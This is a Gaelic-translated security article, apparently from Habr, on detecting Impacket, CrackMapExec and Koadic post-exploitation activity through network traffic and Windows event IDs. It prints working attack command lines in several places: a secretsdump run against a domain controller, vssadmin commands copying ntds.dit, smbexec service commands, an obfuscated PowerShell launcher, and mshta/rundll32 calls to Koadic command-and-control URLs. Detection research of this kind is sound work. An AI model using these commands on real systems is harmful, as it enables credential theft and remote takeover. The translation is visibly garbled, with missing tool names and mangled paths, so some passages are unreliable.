Tha an àireamh de dh’ ionnsaighean anns an roinn chorporra a’ fàs gach bliadhna: mar eisimpleir na ann an 2016, agus aig deireadh 2018 - na anns an ùine roimhe. A’ gabhail a-steach an fheadhainn far a bheil am prìomh inneal obrach siostam-obrachaidh Windows. Ann an 2017-2018, an APT Dragonfly, APT28, rinn e ionnsaighean air buidhnean riaghaltais is armachd san Roinn Eòrpa, Ameireagadh a Tuath agus Saudi Arabia. Agus chleachd sinn trì innealan airson seo - , и . Tha an còd stòr aca fosgailte agus ri fhaighinn air GitHub.
'S fhiach toirt fa-near nach eil na h-innealan sin air an cleachdadh airson a' chiad dol a-steach, ach gus ionnsaigh a leasachadh taobh a-staigh a 'bhun-structair. Bidh luchd-ionnsaigh gan cleachdadh aig diofar ìrean den ionnsaigh às deidh dhaibh a dhol a-steach don iomall. Tha seo, leis an t-slighe, duilich a lorg agus gu tric a-mhàin le cuideachadh bho theicneòlas no innealan a cheadaicheas . Bidh na h-innealan a’ toirt seachad grunn ghnìomhan, bho bhith a’ gluasad fhaidhlichean gu bhith ag eadar-obrachadh leis a’ chlàr agus a’ cur an gnìomh òrdughan air inneal iomallach. Rinn sinn sgrùdadh air na h-innealan sin gus an gnìomhachd lìonraidh aca a dhearbhadh.
Na dh'fheumadh sinn a dhèanamh:
- Tuig mar a tha innealan hacking ag obair. Faigh a-mach dè a dh’ fheumas luchd-ionnsaigh a chleachdadh agus dè na teicneòlasan as urrainn dhaibh a chleachdadh.
- Lorg dè nach eil air a lorg le innealan tèarainteachd fiosrachaidh anns na ciad ìrean de ionnsaigh. Faodar an ìre sgrùdaidh a sheachnadh, an dàrna cuid leis gu bheil an neach-ionnsaigh na neach-ionnsaigh a-staigh, no leis gu bheil an neach-ionnsaigh a’ gabhail brath air toll sa bhun-structair nach robh fios roimhe. Bidh e comasach an sreath iomlan de na gnìomhan aige a thoirt air ais, agus mar sin am miann gluasad a bharrachd a lorg.
- Cuir às do rudan meallta bho innealan lorg sàrachadh. Cha bu chòir dhuinn dìochuimhneachadh, nuair a lorgar gnìomhan sònraichte air bunait taisgealaidh a-mhàin, gu bheil mearachdan tric comasach. Mar as trice anns a 'bhun-structair tha àireamh gu leòr de dhòighean ann, nach eil eadar-dhealaichte bhon fheadhainn dhligheach aig a' chiad shealladh, airson fiosrachadh sam bith fhaighinn.
Dè a bheir na h-innealan sin do luchd-ionnsaigh? Mas e Ipacket a tha seo, gheibh luchd-ionnsaigh leabharlann mòr de mhodalan a dh'fhaodar a chleachdadh aig diofar ìrean den ionnsaigh às deidh dhaibh an iomall a bhriseadh. Bidh mòran innealan a’ cleachdadh mhodalan Ipacket air an taobh a-staigh - mar eisimpleir, Metasploit. Tha dcomexec agus wmiexec aige airson coileanadh àithne iomallach, dìomhaireachdan airson cunntasan fhaighinn bho chuimhne a thèid a chur ris bho Impacket. Mar thoradh air an sin, nì lorg ceart air gnìomhachd leabharlann mar sin cinnteach gun lorgar derivatives.
Chan e co-thuiteamas a th’ ann gun do sgrìobh an luchd-cruthachaidh “Powered by Impacket” mu CrackMapExec (no dìreach CME). A bharrachd air an sin, tha comas-gnìomh deiseil aig CME airson suidheachaidhean mòr-chòrdte: Mimikatz airson faclan-faire fhaighinn no na hashes aca, buileachadh Meterpreter no àidseant Empire airson cur gu bàs aig astar, agus Bloodhound air bòrd.
B’ e Koadic an treas inneal a thagh sinn. Tha e gu math o chionn ghoirid, chaidh a thaisbeanadh aig co-labhairt hacker eadar-nàiseanta DEFCON 25 ann an 2017 agus tha e air a chomharrachadh le dòigh-obrach neo-àbhaisteach: bidh e ag obair tro HTTP, Java Script agus Microsoft Visual Basic Script (VBS). Canar fuireach far an fhearainn ris an dòigh-obrach seo: bidh an t-inneal a’ cleachdadh seata de eisimeileachd agus leabharlannan air an togail a-steach do Windows. Canaidh an luchd-cruthachaidh COM Command & Control ris, no C3.
IMPACKET
Tha comas-gnìomh Impacket gu math farsaing, bho bhith a’ sgrùdadh taobh a-staigh AD agus a’ cruinneachadh dàta bho luchd-frithealaidh MS SQL a-staigh, gu dòighean airson teisteanasan fhaighinn: is e ionnsaigh sealaidheachd SMB a tha seo, agus faighinn am faidhle ntds.dit anns a bheil hashes de fhaclan-faire cleachdaiche bho rianadair fearainn. Bidh Ipacket cuideachd a’ cur an gnìomh òrdughan air astar a’ cleachdadh ceithir diofar dhòighean: WMI, Seirbheis Riaghlaidh Clàr-ama Windows, DCOM, agus SMB, agus feumaidh e teisteanasan airson sin a dhèanamh.
Dumpadh dìomhair
Bheir sinn sùil air secretsdump. Is e modal a tha seo as urrainn cuimseachadh air gach cuid innealan luchd-cleachdaidh agus luchd-riaghlaidh fearainn. Faodar a chleachdadh gus lethbhric fhaighinn de raointean cuimhne LSA, SAM, SECURITY, NTDS.dit, gus am faicear e aig diofar ìrean den ionnsaigh. Is e a’ chiad cheum ann an obrachadh a’ mhodal dearbhadh tro SMB, a dh’ fheumas an dàrna cuid facal-faire an neach-cleachdaidh no an hash aige gus an ionnsaigh Pass the Hash a dhèanamh gu fèin-ghluasadach. An uairsin thig iarrtas gus ruigsinneachd fhosgladh gu Manaidsear Smachd Seirbheis (SCM) agus faighinn chun chlàr tron phròtacal winreg, a ’cleachdadh an urrainn do neach-ionnsaigh faighinn a-mach dàta meuran inntinneach agus toraidhean fhaighinn tro SMB.
Ann am Fig. 1 chì sinn dè dìreach nuair a bhios tu a’ cleachdadh protocol winreg, gheibhear ruigsinneachd le bhith a’ cleachdadh iuchair clàraidh le LSA. Gus seo a dhèanamh, cleachd an àithne DCERPC le opcode 15 - OpenKey.
Reis. 1. A 'fosgladh iuchair chlàraidh a' cleachdadh protocol winreg
An ath rud, nuair a gheibhear ruigsinneachd air an iuchair, thèid na luachan a shàbhaladh leis an àithne SaveKey le opcode 20. Bidh Ipacket a’ dèanamh seo ann an dòigh gu math sònraichte. Sàbhalaidh e na luachan gu faidhle leis an ainm sreath de 8 caractaran air thuaiream ceangailte ri .tmp. A bharrachd air an sin, thèid tuilleadh luchdachadh suas den fhaidhle seo tro SMB bhon eòlaire System32 (Fig. 2).
Reis. 2. Sgeama airson iuchair clàraidh fhaighinn bho inneal iomallach
Tha e a ’tionndadh a-mach gum faodar a leithid de ghnìomhachd air an lìonra a lorg le ceistean gu meuran clàraidh sònraichte a’ cleachdadh protocol winreg, ainmean sònraichte, òrdughan agus an òrdugh aca.
Bidh am modal seo cuideachd a’ fàgail lorgan ann an loga tachartas Windows, ga dhèanamh furasta a lorg. Mar eisimpleir, mar thoradh air an òrdugh a chur an gnìomh
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCAnn an log Windows Server 2016 chì sinn an sreath de thachartasan a leanas:
1. 4624 - Logan iomallach.
2. 5145 - a' sgrùdadh chòraichean-slighe gu seirbheis iomallach winreg.
3. 5145 - a' sgrùdadh chòraichean-slighe fhaidhlichean ann an eòlaire System32. Tha an t-ainm air thuaiream air an ainmeachadh gu h-àrd air an fhaidhle.
4. 4688 - cruthachadh pròiseas cmd.exe a chuireas air bhog vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - cruthachadh pròiseas leis an àithne:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - cruthachadh pròiseas leis an àithne:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - cruthachadh pròiseas leis an àithne:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Coltach ri mòran innealan às deidh brath, tha modalan aig Ipacket airson òrdughan a chuir an gnìomh air astar. Cuiridh sinn fòcas air smbexec, a bheir seachad slige àithne eadar-ghnìomhach air inneal iomallach. Feumaidh am modal seo cuideachd dearbhadh tro SMB, an dàrna cuid le facal-faire no hash facal-faire. Ann am Fig. Ann am Figear 3 chì sinn eisimpleir de mar a tha inneal mar seo ag obair, sa chùis seo is e consol rianadair ionadail a th’ ann.
Reis. 3. Console smbexec eadar-ghnìomhach
Is e a’ chiad cheum de smbexec às deidh dearbhadh an SCM fhosgladh leis an àithne OpenSCManagerW (15). Tha a’ cheist sònraichte: tha an raon MachineName DUMMY.
Reis. 4. Iarrtas fhosgladh Manaidsear Smachd Seirbheis
An ath rud, thèid an t-seirbheis a chruthachadh a’ cleachdadh an àithne CreateServiceW (12). Ann an cùis smbexec, chì sinn an aon loidsig togail àithne a h-uile turas. Ann am Fig. Tha 5 uaine a’ comharrachadh paramadairean àithne nach gabh atharrachadh, tha buidhe a’ nochdadh dè as urrainn do neach-ionnsaigh atharrachadh. Tha e furasta fhaicinn gum faodar ainm an fhaidhle so-ghnìomhaichte, an eòlaire aige agus am faidhle toraidh atharrachadh, ach tha an còrr tòrr nas duilghe atharrachadh gun a bhith a’ cur dragh air loidsig a’ mhodal Impacket.
Reis. 5. Iarrtas airson seirbheis a chruthachadh a 'cleachdadh Manaidsear Smachd Seirbheis
Bidh Smbexec cuideachd a’ fàgail comharran follaiseach ann an loga tachartas Windows. Ann an log Windows Server 2016 airson an t-slige àithne eadar-ghnìomhach leis an àithne ipconfig, chì sinn an t-sreath de thachartasan a leanas:
1. 4697 - stàladh na seirbheis air inneal an neach-fulaing:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - cruthachadh pròiseas cmd.exe leis na h-argamaidean bho phuing 1.
3. 5145 - a' sgrùdadh chòraichean-slighe air an fhaidhle __output san eòlaire C$.
4. 4697 - stàladh na seirbheis air inneal an neach-fulaing.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - cruthachadh pròiseas cmd.exe leis na h-argamaidean bho phuing 4.
6. 5145 - a' sgrùdadh chòraichean-slighe air an fhaidhle __output san eòlaire C$.
Tha Impacket na bhunait airson leasachadh innealan ionnsaigh. Bidh e a’ toirt taic do cha mhòr a h-uile protocol ann am bun-structar Windows agus aig an aon àm tha na feartan sònraichte aige fhèin. Seo iarrtasan winreg sònraichte, agus cleachdadh an SCM API le cruthachadh àithne àbhaisteach, agus cruth ainm faidhle, agus SMB share SYSTEM32.
CRACKMAPEXEC
Tha an inneal CME air a dhealbhadh gu sònraichte gus na gnìomhan àbhaisteach sin a dhèanamh fèin-ghluasadach a dh’ fheumas neach-ionnsaigh a dhèanamh gus gluasad air adhart taobh a-staigh an lìonra. Leigidh e leat a bhith ag obair ann an co-bhonn leis an àidseant ainmeil Empire agus Meterpreter. Gus òrdughan a chuir an gnìomh gu dìomhair, faodaidh CME am falach. A’ cleachdadh Bloodhound (inneal taisgealaidh air leth), faodaidh neach-ionnsaigh an rannsachadh airson seisean rianadair fearainn gnìomhach a dhèanamh fèin-ghluasadach.
Bloodhound
Tha Bloodhound, mar inneal leis fhèin, a’ ceadachadh ath-sgrùdadh adhartach taobh a-staigh an lìonra. Bidh e a’ cruinneachadh dàta mu luchd-cleachdaidh, innealan, buidhnean, seiseanan agus air a thoirt seachad mar sgriobt PowerShell no faidhle binary. Bithear a’ cleachdadh protocolaidhean LDAP no SMB airson fiosrachadh a chruinneachadh. Leigidh modal amalachaidh CME le Bloodhound a bhith air a luchdachadh sìos gu inneal an neach-fulang, a’ ruith agus a’ faighinn an dàta cruinnichte às deidh a chuir gu bàs, agus mar sin ag fèin-ghluasad gnìomhan san t-siostam agus gan dèanamh cho follaiseach. Bidh slige grafaigeach Bloodhound a’ taisbeanadh an dàta cruinnichte ann an cruth ghrafaichean, a leigeas leat an t-slighe as giorra a lorg bho inneal an neach-ionnsaigh gu rianadair an fhearainn.
Reis. 6. Eadar-aghaidh Bloodhound
Gus ruith air inneal an neach-fulang, bidh am modal a’ cruthachadh gnìomh a’ cleachdadh ATSVC agus SMB. Tha ATSVC na eadar-aghaidh airson a bhith ag obair leis an Windows Task Scheduler. Bidh CME a’ cleachdadh a ghnìomh NetrJobAdd(1) gus obraichean a chruthachadh thairis air an lìonra. Tha eisimpleir de na bhios am modal CME a’ cur a-mach ri fhaicinn ann am Figear. 7: Is e seo gairm àithne cmd.exe agus còd obfuscated ann an cruth argamaidean ann an cruth XML.
Fig.7. A 'cruthachadh gnìomh tro CME
Às deidh don ghnìomh a bhith air a chuir a-steach airson a chuir gu bàs, bidh inneal an neach-fulang a ’tòiseachadh Bloodhound fhèin, agus chithear seo anns an trafaic. Tha am modal air a chomharrachadh le ceistean LDAP gus buidhnean àbhaisteach fhaighinn, liosta de na h-innealan agus luchd-cleachdaidh uile san raon, agus fiosrachadh fhaighinn mu sheiseanan cleachdaiche gnìomhach tro iarrtas SRVSVC NetSessEnum.
Reis. 8. A' faighinn liosta de sheiseanan gnìomhach tro SMB
A bharrachd air an sin, an cois cur air bhog Bloodhound air inneal neach-fulang le sgrùdadh air a chomasachadh bidh tachartas le ID 4688 (cruthachadh pròiseas) agus ainm a’ phròiseas «C:WindowsSystem32cmd.exe». Is e an rud a tha sònraichte mu dheidhinn na h-argamaidean loidhne-àithne:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Tha am modal enum_avproducts gu math inntinneach a thaobh comas-gnìomh agus buileachadh. Leigidh WMI leat cànan ceist WQL a chleachdadh gus dàta fhaighinn air ais bho dhiofar stuthan Windows, agus is e sin gu bunaiteach a bhios am modal CME seo a’ cleachdadh. Bidh e a’ togail cheistean gu na clasaichean AntiSpywareProduct agus AntiМirusProduct mu na h-innealan dìon a chaidh a chuir a-steach air inneal an neach-fulaing. Gus an dàta riatanach fhaighinn, bidh am modal a’ ceangal ri àite-ainm rootSecurityCenter2, an uairsin a’ gineadh ceist WQL agus a’ faighinn freagairt. Ann am Fig. Tha Figear 9 a’ sealltainn na tha anns na h-iarrtasan agus na freagairtean sin. Anns an eisimpleir againn, chaidh Windows Defender a lorg.
Reis. 9. Gnìomh lìonra a 'mhodal enum_avproducts
Gu tric, dh’ fhaodadh gun tèid sgrùdadh WMI (Trace WMI-Activity), aig na tachartasan far am faigh thu fiosrachadh feumail mu cheistean WQL. Ach ma tha e air a chomasachadh, an uairsin ma thèid an sgriobt enum_avproducts a ruith, thèid tachartas le ID 11 a shàbhaladh. Bidh ainm an neach-cleachdaidh a chuir an t-iarrtas agus an t-ainm san ainm-spàs rootSecurityCenter2 ann.
Bha na stuthan aige fhèin aig gach aon de na modalan CME, ge bith an e ceistean sònraichte WQL a bh’ ann no cruthachadh seòrsa sònraichte de ghnìomhachd ann an clàr-ama gnìomh le obfuscation agus gnìomhachd sònraichte Bloodhound ann an LDAP agus SMB.
KOADIC
Is e feart sònraichte de Koadic cleachdadh eadar-mhìnearan JavaScript agus VBScript air an togail a-steach do Windows. San t-seagh seo, tha e a’ leantainn gluasad beò far an fhearainn - is e sin, chan eil eisimeileachd taobh a-muigh aige agus bidh e a’ cleachdadh innealan àbhaisteach Windows. Is e inneal a tha seo airson làn Òrdugh & Smachd (CnC), oir às deidh galar tha “implant” air a chuir a-steach air an inneal, a ’leigeil leis smachd a chumail air. Canar “zombie” ri inneal mar seo, ann am briathrachas Koadic. Mura h-eil sochairean gu leòr ann airson làn obrachadh air taobh an neach-fulaing, tha comas aig Koadic an togail le bhith a’ cleachdadh dòighean seach-rathad Smachd Cunntas Cleachdaiche (seach-rathad UAC).
Reis. 10. Slige Koadic
Feumaidh an neach-fulang conaltradh a thòiseachadh leis an t-seirbheisiche Command & Control. Gus seo a dhèanamh, feumaidh i fios a chuir gu URI a chaidh ullachadh roimhe agus faighinn chun phrìomh bhuidheann Koadic a ’cleachdadh aon de na stagers. Ann am Fig. Tha Figear 11 a’ sealltainn eisimpleir airson an stager mshta.
Reis. 11. A' tòiseachadh seisean leis an fhrithealaiche CNC
Stèidhichte air an caochladair freagairt WS, bidh e soilleir gu bheil coileanadh a’ tachairt tro WScript.Shell, agus tha prìomh fhiosrachadh anns na caochladairean STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE mu pharamadairean an t-seisein làithreach. Is e seo a’ chiad phaidhir iarrtas-freagairt ann an ceangal HTTP ri frithealaiche CNC. Tha iarrtasan às deidh sin ceangailte gu dìreach ri gnìomhachd nam modalan ris an canar (implants). Bidh a h-uile modal Koadic ag obair a-mhàin le seisean gnìomhach le CNC.
Mimikatz
Dìreach mar a bhios CME ag obair le Bloodhound, bidh Koadic ag obair le Mimikatz mar phrògram air leth agus tha iomadh dòigh aige air a chuir air bhog. Gu h-ìosal tha paidhir iarrtas-freagairt airson an implant Mimikatz a luchdachadh sìos.
Reis. 12. Gluasad Mimikatz gu Koadic
Chì thu mar a tha cruth URI san iarrtas air atharrachadh. Tha luach ann a-nis airson an caochladair csrf, a tha an urra ris a’ mhodal taghte. Na toir aire d'a h-ainm ; Tha fios againn uile gu bheil CSRF mar as trice air a thuigsinn ann an dòigh eadar-dhealaichte. B’ e am freagairt an aon phrìomh bhuidheann de Koadic, ris an deach còd co-cheangailte ri Mimikatz a chur ris. Tha e gu math mòr, mar sin leig dhuinn sùil a thoirt air na prìomh phuingean. An seo tha leabharlann Mimikatz againn air a chòdachadh ann am base64, clas sreathach .NET a chuireas a-steach e, agus argamaidean airson Mimikatz a chuir air bhog. Thèid an toradh a chuir gu bàs a chuir thairis air an lìonra ann an teacsa soilleir.
Reis. 13. Toradh ruith Mimikatz air inneal iomallach
Exec_cmd
Tha modalan aig Koadic cuideachd as urrainn òrdughan a chuir an gnìomh air astar. An seo chì sinn an aon dòigh ginealach URI agus na caochladairean sid agus csrf eòlach. Ann an cùis a’ mhodal exec_cmd, thèid còd a chur ris a’ bhodhaig a tha comasach air òrdughan shligean a chuir an gnìomh. Gu h-ìosal tha còd mar sin air a shealltainn ann am freagairt HTTP an fhrithealaiche CNC.
Reis. 14. Còd implant exec_cmd
Tha feum air an caochladair GAWTUUGCFI leis a’ fheart WS eòlach airson coileanadh còd. Le a chuideachadh, bidh an implant a 'gairm an t-slige, a' giullachd dà mheur de chòd - shell.exec le tilleadh an t-sruth dàta toraidh agus shell.run gun tilleadh.
Chan e inneal àbhaisteach a th’ ann an Koadic, ach tha na stuthan aige fhèin leis am faighear e ann an trafaic dhligheach:
- cruthachadh sònraichte de iarrtasan HTTP,
- a’ cleachdadh winHttpRequests API,
- cruthachadh nì WScript.Shell tro ActiveXObject,
- corp mòr a ghabhas coileanadh.
Tha a’ chiad cheangal air a thòiseachadh leis an stager, agus mar sin tha e comasach a ghnìomhachd a lorg tro thachartasan Windows. Airson mshta, is e seo tachartas 4688, a tha a’ comharrachadh cruthachadh pròiseas leis a’ fheart tòiseachaidh:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Fhad ‘s a tha Koadic a’ ruith, chì thu tachartasan 4688 eile le buadhan a tha ga chomharrachadh gu foirfe:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1toraidhean
Tha gluasad beò bhon fhearann a’ fàs mòr-chòrdte am measg eucoirich. Bidh iad a’ cleachdadh na h-innealan agus uidheamachdan a tha air an togail a-steach do Windows airson am feumalachdan. Tha sinn a ’faicinn innealan mòr-chòrdte Koadic, CrackMapExec agus Impacket a’ leantainn a ’phrionnsapail seo a’ nochdadh barrachd is barrachd ann an aithisgean APT. Tha an àireamh de forcaichean air GitHub airson na h-innealan sin cuideachd a 'fàs, agus tha feadhainn ùra a' nochdadh (tha mu mhìle dhiubh ann a-nis). Tha an gluasad a’ fàs mòr-chòrdte air sgàth cho sìmplidh ‘s a tha e: chan fheum luchd-ionnsaigh innealan treas-phàrtaidh; tha iad mu thràth air innealan luchd-fulaing agus cuidichidh iad le bhith a’ dol seachad air ceumannan tèarainteachd. Bidh sinn a 'cuimseachadh air a bhith a' sgrùdadh conaltradh lìonra: bidh gach inneal a tha air a mhìneachadh gu h-àrd a 'fàgail a lorg fhèin ann an trafaig lìonra; thug sgrùdadh mionaideach orra cothrom dhuinn ar toradh a theagasg lorg iad, a chuidicheas aig a’ cheann thall le bhith a’ sgrùdadh an t-sreath iomlan de thachartasan saidhbear anns a bheil iad.
ùghdaran:
- Anton Tyurin, Ceannard Roinn Seirbheisean Eòlaiche, Ionad Tèarainteachd Eòlaiche PT, Teicneòlasan Deimhinneach
- Egor Podmokov, eòlaiche, Ionad Tèarainteachd Eòlaiche PT, Teicneòlasan Deimhinneach
Source: www.habr.com